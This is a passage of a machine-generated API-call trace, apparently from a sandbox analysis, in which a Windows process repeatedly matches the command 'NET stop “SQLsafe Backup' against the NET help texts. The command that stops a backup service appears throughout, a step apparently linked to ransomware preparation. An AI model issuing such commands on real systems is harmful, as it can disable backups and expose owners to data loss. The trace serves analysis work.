RPCLOCATOR\r\n", _MaxCount=0x18) returned 14 [0126.650] LocalFree (hMem=0x5f5508) returned 0x0 [0126.650] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0x27f7c0, nSize=0x0, Arguments=0x27f7bc | out: lpBuffer="唈_⡋盺'唈_'") returned 0x11 [0126.650] _wcsnicmp (_String1="NET stop “SQLsafe Backup", _String2="NET START RPCSS\r\n", _MaxCount=0x18) returned 14 [0126.650] LocalFree (hMem=0x5f5508) returned 0x0 [0126.650] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc38, dwLanguageId=0x0, lpBuffer=0x27f7c0, nSize=0x0, Arguments=0x27f7bc | out: lpBuffer="唈_⡋盺'唈_'") returned 0x14 [0126.650] _wcsnicmp (_String1="NET stop “SQLsafe Backup", _String2="NET START SCHEDULE\r\n", _MaxCount=0x18) returned 14 [0126.650] LocalFree (hMem=0x5f5508) returned 0x0 [0126.650] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0x27f7c0, nSize=0x0, Arguments=0x27f7bc | out: lpBuffer="唈_⡋盺'唈_'") returned 0x12 [0126.650] _wcsnicmp (_String1="NET stop “SQLsafe Backup", _String2="NET START SERVER\r\n", _MaxCount=0x18) returned 14 [0126.650] LocalFree (hMem=0x5f5508) returned 0x0 [0126.650] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0x27f7c0, nSize=0x0, Arguments=0x27f7bc | out: lpBuffer="唈_⡋盺'唈_'") returned 0xf [0126.650] _wcsnicmp (_String1="NET stop “SQLsafe Backup", _String2="NET START UPS\r\n", _MaxCount=0x18) returned 14 [0126.650] LocalFree (hMem=0x5f5508) returned 0x0 [0126.650] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0x27f7c0, nSize=0x0, Arguments=0x27f7bc | out: lpBuffer="唈_⡋盺'唈_'") returned 0x17 [0126.650] _wcsnicmp (_String1="NET stop “SQLsafe Backup", _String2="NET START WORKSTATION\r\n", _MaxCount=0x18) returned 14 [0126.650] LocalFree (hMem=0x5f5508) returned 0x0 [0126.651] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc44, dwLanguageId=0x0, lpBuffer=0x27f7c0, nSize=0x0, Arguments=0x27f7bc | out: lpBuffer="唈_⡋盺'唈_'") returned 0x18 [0126.651] _wcsnicmp (_String1="NET stop “SQLsafe Backup", _String2="NET START\r\n[service]\r\n\r\n", _MaxCount=0x18) returned 14 [0126.651] LocalFree (hMem=0x5f5508) returned 0x0 [0126.651] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc47, dwLanguageId=0x0, lpBuffer=0x27f7c0, nSize=0x0, Arguments=0x27f7bc | out: lpBuffer="唈_⡋盺'唈_'") returned 0x2a [0126.651] _wcsnicmp (_String1="NET stop “SQLsafe Backup", _String2="NET STATISTICS\r\n[WORKSTA", _MaxCount=0x18) returned 14 [0126.651] LocalFree (hMem=0x5f5508) returned 0x0 [0126.651] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc4a, dwLanguageId=0x0, lpBuffer=0x27f7c0, nSize=0x0, Arguments=0x27f7bc | out: lpBuffer="唈_⡋盺'唈_'") returned 0x15 [0126.651] _wcsnicmp (_String1="NET stop “SQLsafe Backup", _String2="NET STOP\r\nservice\r\n\r\n", _MaxCount=0x18) returned 19 [0126.651] LocalFree (hMem=0x5f5508) returned 0x0 [0126.651] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc4d, dwLanguageId=0x0, lpBuffer=0x27f7c0, nSize=0x0, Arguments=0x27f7bc | out: lpBuffer="唈_⡋盺'唈_'") returned 0x58 [0126.651] _wcsnicmp (_String1="NET stop “SQLsafe Backup", _String2="NET TIME\r\n\r\n[\\\\computern", _MaxCount=0x18) returned -1 [0126.651] LocalFree (hMem=0x5f5508) returned 0x0 [0126.651] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc50, dwLanguageId=0x0, lpBuffer=0x27f7c0, nSize=0x0, Arguments=0x27f7bc | out: lpBuffer="唈_⡋盺'唈_'") returned 0x184 [0126.651] _wcsnicmp (_String1="NET stop “SQLsafe Backup", _String2="NET USE\r\n[devicename | *", _MaxCount=0x18) returned -2 [0126.651] LocalFree (hMem=0x5f5508) returned 0x0 [0126.651] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc53, dwLanguageId=0x0, lpBuffer=0x27f7c0, nSize=0x0, Arguments=0x27f7bc | out: lpBuffer="唈_⡋盺'唈_'") returned 0xc7 [0126.651] _wcsnicmp (_String1="NET stop “SQLsafe Backup", _String2="NET USER\r\n[username [pas", _MaxCount=0x18) returned -2 [0126.651] LocalFree (hMem=0x5f5508) returned 0x0 [0126.651] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc56, dwLanguageId=0x0, lpBuffer=0x27f7c0, nSize=0x0, Arguments=0x27f7bc | out: lpBuffer="唈_⡋盺'唈_'") returned 0x47 [0126.651] _wcsnicmp (_String1="NET stop “SQLsafe Backup", _String2="NET VIEW\r\n[\\\\computernam", _MaxCount=0x18) returned -3 [0126.651] LocalFree (hMem=0x5f5508) returned 0x0 [0126.651] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc59, dwLanguageId=0x0, lpBuffer=0x27f7c0, nSize=0x0, Arguments=0x27f7bc | out: lpBuffer="唈_⡋盺'唈_'") returned 0xc2 [0126.651] _wcsnicmp (_String1="NET stop “SQLsafe Backup", _String2="NET\r\n [ ACCOUNTS | CO", _MaxCount=0x18) returned 19 [0126.651] LocalFree (hMem=0x5f5508) returned 0x0 [0126.651] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc5c, dwLanguageId=0x0, lpBuffer=0x27f7c0, nSize=0x0, Arguments=0x27f7bc | out: lpBuffer="唈_⡋盺'唈_'") returned 0x319 [0126.651] _wcsnicmp (_String1="NET stop “SQLsafe Backup", _String2="SERVICES\r\nNET START can ", _MaxCount=0x18) returned -5 [0126.651] LocalFree (hMem=0x5f5508) returned 0x0 [0126.651] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc5f, dwLanguageId=0x0, lpBuffer=0x27f7c0, nSize=0x0, Arguments=0x27f7bc | out: lpBuffer="唈_⡋盺'唈_'") returned 0x483 [0126.651] _wcsnicmp (_String1="NET stop “SQLsafe Backup", _String2="SYNTAX\r\nThe following co", _MaxCount=0x18) returned -5 [0126.651] LocalFree (hMem=0x5f5508) returned 0x0 [0126.651] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc62, dwLanguageId=0x0, lpBuffer=0x27f7c0, nSize=0x0, Arguments=0x27f7bc | out: lpBuffer="唈_⡋盺'唈_'") returned 0xa86 [0126.651] _wcsnicmp (_String1="NET stop “SQLsafe Backup", _String2="NAMES\r\nThe following typ", _MaxCount=0x18) returned 4 [0126.651] LocalFree (hMem=0x5f5508) returned 0x0 [0126.651] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc65, dwLanguageId=0x0, lpBuffer=0x27f7c0, nSize=0x0, Arguments=0x27f7bc | out: lpBuffer="唈_⡋盺'唈_'") returned 0x54 [0126.651] _wcsnicmp (_String1="NET stop “SQLsafe Backup", _String2="\r\nFor more information o", _MaxCount=0x18) returned 97 [0126.652] LocalFree (hMem=0x5f5508) returned 0x0 [0126.652] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xbfc, dwLanguageId=0x0, lpBuffer=0x27f7c0, nSize=0x0, Arguments=0x27f7bc | out: lpBuffer="唈_⡋盺'唈_'") returned 0xad [0126.652] _wcsnicmp (_String1="NET stop “SQLsafe", _String2="NET ACCOUNTS\r\n[/F", _MaxCount=0x11) returned 18 [0126.652] LocalFree (hMem=0x5f5508) returned 0x0 [0126.652] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0x27f7c0, nSize=0x0, Arguments=0x27f7bc | out: lpBuffer="唈_⡋盺'唈_'") returned 0x2e [0126.652] _wcsnicmp (_String1="NET stop “SQLsafe", _String2="NET COMPUTER\r\n\\\\c", _MaxCount=0x11) returned 16 [0126.652] LocalFree (hMem=0x5f5508) returned 0x0 [0126.652] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0x27f7c0, nSize=0x0, Arguments=0x27f7bc | out: lpBuffer="唈_⡋盺'唈_'") returned 0x7d [0126.652] _wcsnicmp (_String1="NET stop “SQLsafe", _String2="NET CONFIG SERVER", _MaxCount=0x11) returned 16 [0126.652] LocalFree (hMem=0x5f5508) returned 0x0 [0126.652] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0x27f7c0, nSize=0x0, Arguments=0x27f7bc | out: lpBuffer="唈_⡋盺'唈_'") returned 0x26 [0126.652] _wcsnicmp (_String1="NET stop “SQLsafe", _String2="NET CONFIG\r\n[SERV", _MaxCount=0x11) returned 16 [0126.652] LocalFree (hMem=0x5f5508) returned 0x0 [0126.652] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc08, dwLanguageId=0x0, lpBuffer=0x27f7c0, nSize=0x0, Arguments=0x27f7bc | out: lpBuffer="唈_⡋盺'唈_'") returned 0x19 [0126.652] _wcsnicmp (_String1="NET stop “SQLsafe", _String2="NET CONTINUE\r\nser", _MaxCount=0x11) returned 16 [0126.652] LocalFree (hMem=0x5f5508) returned 0x0 [0126.652] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc0b, dwLanguageId=0x0, lpBuffer=0x27f7c0, nSize=0x0, Arguments=0x27f7bc | out: lpBuffer="唈_⡋盺'唈_'") returned 0x1b [0126.652] _wcsnicmp (_String1="NET stop “SQLsafe", _String2="NET FILE\r\n[id [/C", _MaxCount=0x11) returned 13 [0126.652] LocalFree (hMem=0x5f5508) returned 0x0 [0126.652] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0x27f7c0, nSize=0x0, Arguments=0x27f7bc | out: lpBuffer="唈_⡋盺'唈_'") returned 0xbe [0126.652] _wcsnicmp (_String1="NET stop “SQLsafe", _String2="NET GROUP\r\n[group", _MaxCount=0x11) returned 12 [0126.652] LocalFree (hMem=0x5f5508) returned 0x0 [0126.652] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0x27f7c0, nSize=0x0, Arguments=0x27f7bc | out: lpBuffer="唈_⡋盺'唈_'") returned 0x33 [0126.652] _wcsnicmp (_String1="NET stop “SQLsafe", _String2="NET HELP\r\ncommand", _MaxCount=0x11) returned 11 [0126.652] LocalFree (hMem=0x5f5508) returned 0x0 [0126.652] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc14, dwLanguageId=0x0, lpBuffer=0x27f7c0, nSize=0x0, Arguments=0x27f7bc | out: lpBuffer="唈_⡋盺'唈_'") returned 0x19 [0126.652] _wcsnicmp (_String1="NET stop “SQLsafe", _String2="NET HELPMSG\r\nmess", _MaxCount=0x11) returned 11 [0126.652] LocalFree (hMem=0x5f5508) returned 0x0 [0126.652] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc17, dwLanguageId=0x0, lpBuffer=0x27f7c0, nSize=0x0, Arguments=0x27f7bc | out: lpBuffer="唈_⡋盺'唈_'") returned 0xc1 [0126.652] _wcsnicmp (_String1="NET stop “SQLsafe", _String2="NET LOCALGROUP\r\n[", _MaxCount=0x11) returned 7 [0126.652] LocalFree (hMem=0x5f5508) returned 0x0 [0126.652] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0x27f7c0, nSize=0x0, Arguments=0x27f7bc | out: lpBuffer="唈_⡋盺'唈_'") returned 0x16 [0126.652] _wcsnicmp (_String1="NET stop “SQLsafe", _String2="NET PAUSE\r\nservic", _MaxCount=0x11) returned 3 [0126.652] LocalFree (hMem=0x5f5508) returned 0x0 [0126.652] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0x27f7c0, nSize=0x0, Arguments=0x27f7bc | out: lpBuffer="唈_⡋盺'唈_'") returned 0x33 [0126.653] _wcsnicmp (_String1="NET stop “SQLsafe", _String2="NET SESSION\r\n[\\\\c", _MaxCount=0x11) returned 15 [0126.653] LocalFree (hMem=0x5f5508) returned 0x0 [0126.653] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0x27f7c0, nSize=0x0, Arguments=0x27f7bc | out: lpBuffer="唈_⡋盺'唈_'") returned 0x234 [0126.653] _wcsnicmp (_String1="NET stop “SQLsafe", _String2="NET SHARE\r\nsharen", _MaxCount=0x11) returned 12 [0126.653] LocalFree (hMem=0x5f5508) returned 0x0 [0126.653] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0x27f7c0, nSize=0x0, Arguments=0x27f7bc | out: lpBuffer="唈_⡋盺'唈_'") returned 0x13 [0126.653] _wcsnicmp (_String1="NET stop “SQLsafe", _String2="NET START BROWSER", _MaxCount=0x11) returned 14 [0126.653] LocalFree (hMem=0x5f5508) returned 0x0 [0126.653] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0x27f7c0, nSize=0x0, Arguments=0x27f7bc | out: lpBuffer="唈_⡋盺'唈_'") returned 0x14 [0126.653] _wcsnicmp (_String1="NET stop “SQLsafe", _String2="NET START CLIPBOO", _MaxCount=0x11) returned 14 [0126.653] LocalFree (hMem=0x5f5508) returned 0x0 [0126.653] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0x27f7c0, nSize=0x0, Arguments=0x27f7bc | out: lpBuffer="唈_⡋盺'唈_'") returned 0x14 [0126.653] _wcsnicmp (_String1="NET stop “SQLsafe", _String2="NET START EVENTLO", _MaxCount=0x11) returned 14 [0126.653] LocalFree (hMem=0x5f5508) returned 0x0 [0126.653] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0x27f7c0, nSize=0x0, Arguments=0x27f7bc | out: lpBuffer="唈_⡋盺'唈_'") returned 0x15 [0126.653] _wcsnicmp (_String1="NET stop “SQLsafe", _String2="NET START MESSENG", _MaxCount=0x11) returned 14 [0126.653] LocalFree (hMem=0x5f5508) returned 0x0 [0126.653] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0x27f7c0, nSize=0x0, Arguments=0x27f7bc | out: lpBuffer="甈_⡋盺'唈_'") returned 0x15 [0126.653] _wcsnicmp (_String1="NET stop “SQLsafe", _String2="NET START NET LOG", _MaxCount=0x11) returned 14 [0126.653] LocalFree (hMem=0x5f7508) returned 0x0 [0126.653] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0x27f7c0, nSize=0x0, Arguments=0x27f7bc | out: lpBuffer="锈_⡋盺'甈_'") returned 0x16 [0126.653] _wcsnicmp (_String1="NET stop “SQLsafe", _String2="NET START RPCLOCA", _MaxCount=0x11) returned 14 [0126.653] LocalFree (hMem=0x5f9508) returned 0x0 [0126.653] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0x27f7c0, nSize=0x0, Arguments=0x27f7bc | out: lpBuffer="锈_⡋盺'锈_'") returned 0x11 [0126.653] _wcsnicmp (_String1="NET stop “SQLsafe", _String2="NET START RPCSS\r\n", _MaxCount=0x11) returned 14 [0126.653] LocalFree (hMem=0x5f9508) returned 0x0 [0126.653] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc38, dwLanguageId=0x0, lpBuffer=0x27f7c0, nSize=0x0, Arguments=0x27f7bc | out: lpBuffer="锈_⡋盺'锈_'") returned 0x14 [0126.653] _wcsnicmp (_String1="NET stop “SQLsafe", _String2="NET START SCHEDUL", _MaxCount=0x11) returned 14 [0126.653] LocalFree (hMem=0x5f9508) returned 0x0 [0126.653] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0x27f7c0, nSize=0x0, Arguments=0x27f7bc | out: lpBuffer="锈_⡋盺'锈_'") returned 0x12 [0126.653] _wcsnicmp (_String1="NET stop “SQLsafe", _String2="NET START SERVER\r", _MaxCount=0x11) returned 14 [0126.654] LocalFree (hMem=0x5f9508) returned 0x0 [0126.654] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0x27f7c0, nSize=0x0, Arguments=0x27f7bc | out: lpBuffer="锈_⡋盺'锈_'") returned 0xf [0126.654] _wcsnicmp (_String1="NET stop “SQLsafe", _String2="NET START UPS\r\n", _MaxCount=0x11) returned 14 [0126.654] LocalFree (hMem=0x5f9508) returned 0x0 [0126.654] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0x27f7c0, nSize=0x0, Arguments=0x27f7bc | out: lpBuffer="锈_⡋盺'锈_'") returned 0x17 [0126.654] _wcsnicmp (_String1="NET stop “SQLsafe", _String2="NET START WORKSTA", _MaxCount=0x11) returned 14 [0126.654] LocalFree (hMem=0x5f9508) returned 0x0 [0126.654] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc44, dwLanguageId=0x0, lpBuffer=0x27f7c0, nSize=0x0, Arguments=0x27f7bc | out: lpBuffer="锈_⡋盺'锈_'") returned 0x18 [0126.654] _wcsnicmp (_String1="NET stop “SQLsafe", _String2="NET START\r\n[servi", _MaxCount=0x11) returned 14 [0126.654] LocalFree (hMem=0x5f9508) returned 0x0 [0126.654] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc47, dwLanguageId=0x0, lpBuffer=0x27f7c0, nSize=0x0, Arguments=0x27f7bc | out: lpBuffer="锈_⡋盺'锈_'") returned 0x2a [0126.654] _wcsnicmp (_String1="NET stop “SQLsafe", _String2="NET STATISTICS\r\n[", _MaxCount=0x11) returned 14 [0126.654] LocalFree (hMem=0x5f9508) returned 0x0 [0126.654] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc4a, dwLanguageId=0x0, lpBuffer=0x27f7c0, nSize=0x0, Arguments=0x27f7bc | out: lpBuffer="锈_⡋盺'锈_'") returned 0x15 [0126.654] _wcsnicmp (_String1="NET stop “SQLsafe", _String2="NET STOP\r\nservice", _MaxCount=0x11) returned 19 [0126.654] LocalFree (hMem=0x5f9508) returned 0x0 [0126.654] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc4d, dwLanguageId=0x0, lpBuffer=0x27f7c0, nSize=0x0, Arguments=0x27f7bc | out: lpBuffer="锈_⡋盺'锈_'") returned 0x58 [0126.654] _wcsnicmp (_String1="NET stop “SQLsafe", _String2="NET TIME\r\n\r\n[\\\\co", _MaxCount=0x11) returned -1 [0126.654] LocalFree (hMem=0x5f9508) returned 0x0 [0126.654] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc50, dwLanguageId=0x0, lpBuffer=0x27f7c0, nSize=0x0, Arguments=0x27f7bc | out: lpBuffer="锈_⡋盺'锈_'") returned 0x184 [0126.654] _wcsnicmp (_String1="NET stop “SQLsafe", _String2="NET USE\r\n[devicen", _MaxCount=0x11) returned -2 [0126.654] LocalFree (hMem=0x5f9508) returned 0x0 [0126.654] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc53, dwLanguageId=0x0, lpBuffer=0x27f7c0, nSize=0x0, Arguments=0x27f7bc | out: lpBuffer="锈_⡋盺'锈_'") returned 0xc7 [0126.654] _wcsnicmp (_String1="NET stop “SQLsafe", _String2="NET USER\r\n[userna", _MaxCount=0x11) returned -2 [0126.654] LocalFree (hMem=0x5f9508) returned 0x0 [0126.654] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc56, dwLanguageId=0x0, lpBuffer=0x27f7c0, nSize=0x0, Arguments=0x27f7bc | out: lpBuffer="锈_⡋盺'锈_'") returned 0x47 [0126.654] _wcsnicmp (_String1="NET stop “SQLsafe", _String2="NET VIEW\r\n[\\\\comp", _MaxCount=0x11) returned -3 [0126.654] LocalFree (hMem=0x5f9508) returned 0x0 [0126.654] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc59, dwLanguageId=0x0, lpBuffer=0x27f7c0, nSize=0x0, Arguments=0x27f7bc | out: lpBuffer="锈_⡋盺'锈_'") returned 0xc2 [0126.654] _wcsnicmp (_String1="NET stop “SQLsafe", _String2="NET\r\n [ ACCOUN", _MaxCount=0x11) returned 19 [0126.654] LocalFree (hMem=0x5f9508) returned 0x0 [0126.654] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc5c, dwLanguageId=0x0, lpBuffer=0x27f7c0, nSize=0x0, Arguments=0x27f7bc | out: lpBuffer="锈_⡋盺'锈_'") returned 0x319 [0126.654] _wcsnicmp (_String1="NET stop “SQLsafe", _String2="SERVICES\r\nNET STA", _MaxCount=0x11) returned -5 [0126.654] LocalFree (hMem=0x5f9508) returned 0x0 [0126.654] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc5f, dwLanguageId=0x0, lpBuffer=0x27f7c0, nSize=0x0, Arguments=0x27f7bc | out: lpBuffer="锈_⡋盺'锈_'") returned 0x483 [0126.655] _wcsnicmp (_String1="NET stop “SQLsafe", _String2="SYNTAX\r\nThe follo", _MaxCount=0x11) returned -5 [0126.655] LocalFree (hMem=0x5f9508) returned 0x0 [0126.655] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc62, dwLanguageId=0x0, lpBuffer=0x27f7c0, nSize=0x0, Arguments=0x27f7bc | out: lpBuffer="锈_⡋盺'锈_'") returned 0xa86 [0126.655] _wcsnicmp (_String1="NET stop “SQLsafe", _String2="NAMES\r\nThe follow", _MaxCount=0x11) returned 4 [0126.655] LocalFree (hMem=0x5f9508) returned 0x0 [0126.655] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc65, dwLanguageId=0x0, lpBuffer=0x27f7c0, nSize=0x0, Arguments=0x27f7bc | out: lpBuffer="锈_⡋盺'锈_'") returned 0x54 [0126.655] _wcsnicmp (_String1="NET stop “SQLsafe", _String2="\r\nFor more inform", _MaxCount=0x11) returned 97 [0126.655] LocalFree (hMem=0x5f9508) returned 0x0 [0126.655] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xbfc, dwLanguageId=0x0, lpBuffer=0x27f7c0, nSize=0x0, Arguments=0x27f7bc | out: lpBuffer="锈_⡋盺'锈_'") returned 0xad [0126.655] _wcsnicmp (_String1="NET stop", _String2="NET ACCO", _MaxCount=0x8) returned 18 [0126.655] LocalFree (hMem=0x5f9508) returned 0x0 [0126.655] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0x27f7c0, nSize=0x0, Arguments=0x27f7bc | out: lpBuffer="锈_⡋盺'锈_'") returned 0x2e [0126.655] _wcsnicmp (_String1="NET stop", _String2="NET COMP", _MaxCount=0x8) returned 16 [0126.655] LocalFree (hMem=0x5f9508) returned 0x0 [0126.655] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0x27f7c0, nSize=0x0, Arguments=0x27f7bc | out: lpBuffer="锈_⡋盺'锈_'") returned 0x7d [0126.655] _wcsnicmp (_String1="NET stop", _String2="NET CONF", _MaxCount=0x8) returned 16 [0126.655] LocalFree (hMem=0x5f9508) returned 0x0 [0126.655] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0x27f7c0, nSize=0x0, Arguments=0x27f7bc | out: lpBuffer="锈_⡋盺'锈_'") returned 0x26 [0126.655] _wcsnicmp (_String1="NET stop", _String2="NET CONF", _MaxCount=0x8) returned 16 [0126.655] LocalFree (hMem=0x5f9508) returned 0x0 [0126.655] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc08, dwLanguageId=0x0, lpBuffer=0x27f7c0, nSize=0x0, Arguments=0x27f7bc | out: lpBuffer="锈_⡋盺'锈_'") returned 0x19 [0126.655] _wcsnicmp (_String1="NET stop", _String2="NET CONT", _MaxCount=0x8) returned 16 [0126.655] LocalFree (hMem=0x5f9508) returned 0x0 [0126.655] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc0b, dwLanguageId=0x0, lpBuffer=0x27f7c0, nSize=0x0, Arguments=0x27f7bc | out: lpBuffer="锈_⡋盺'锈_'") returned 0x1b [0126.655] _wcsnicmp (_String1="NET stop", _String2="NET FILE", _MaxCount=0x8) returned 13 [0126.655] LocalFree (hMem=0x5f9508) returned 0x0 [0126.655] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0x27f7c0, nSize=0x0, Arguments=0x27f7bc | out: lpBuffer="锈_⡋盺'锈_'") returned 0xbe [0126.656] _wcsnicmp (_String1="NET stop", _String2="NET GROU", _MaxCount=0x8) returned 12 [0126.656] LocalFree (hMem=0x5f9508) returned 0x0 [0126.656] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0x27f7c0, nSize=0x0, Arguments=0x27f7bc | out: lpBuffer="锈_⡋盺'锈_'") returned 0x33 [0126.656] _wcsnicmp (_String1="NET stop", _String2="NET HELP", _MaxCount=0x8) returned 11 [0126.656] LocalFree (hMem=0x5f9508) returned 0x0 [0126.656] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc14, dwLanguageId=0x0, lpBuffer=0x27f7c0, nSize=0x0, Arguments=0x27f7bc | out: lpBuffer="锈_⡋盺'锈_'") returned 0x19 [0126.656] _wcsnicmp (_String1="NET stop", _String2="NET HELP", _MaxCount=0x8) returned 11 [0126.656] LocalFree (hMem=0x5f9508) returned 0x0 [0126.656] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc17, dwLanguageId=0x0, lpBuffer=0x27f7c0, nSize=0x0, Arguments=0x27f7bc | out: lpBuffer="锈_⡋盺'锈_'") returned 0xc1 [0126.656] _wcsnicmp (_String1="NET stop", _String2="NET LOCA", _MaxCount=0x8) returned 7 [0126.656] LocalFree (hMem=0x5f9508) returned 0x0 [0126.656] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0x27f7c0, nSize=0x0, Arguments=0x27f7bc | out: lpBuffer="锈_⡋盺'锈_'") returned 0x16 [0126.656] _wcsnicmp (_String1="NET stop", _String2="NET PAUS", _MaxCount=0x8) returned 3 [0126.656] LocalFree (hMem=0x5f9508) returned 0x0 [0126.656] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0x27f7c0, nSize=0x0, Arguments=0x27f7bc | out: lpBuffer="锈_⡋盺'锈_'") returned 0x33 [0126.656] _wcsnicmp (_String1="NET stop", _String2="NET SESS", _MaxCount=0x8) returned 15 [0126.656] LocalFree (hMem=0x5f9508) returned 0x0 [0126.656] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0x27f7c0, nSize=0x0, Arguments=0x27f7bc | out: lpBuffer="锈_⡋盺'锈_'") returned 0x234 [0126.656] _wcsnicmp (_String1="NET stop", _String2="NET SHAR", _MaxCount=0x8) returned 12 [0126.656] LocalFree (hMem=0x5f9508) returned 0x0 [0126.656] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0x27f7c0, nSize=0x0, Arguments=0x27f7bc | out: lpBuffer="锈_⡋盺'锈_'") returned 0x13 [0126.656] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0126.656] LocalFree (hMem=0x5f9508) returned 0x0 [0126.656] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0x27f7c0, nSize=0x0, Arguments=0x27f7bc | out: lpBuffer="锈_⡋盺'锈_'") returned 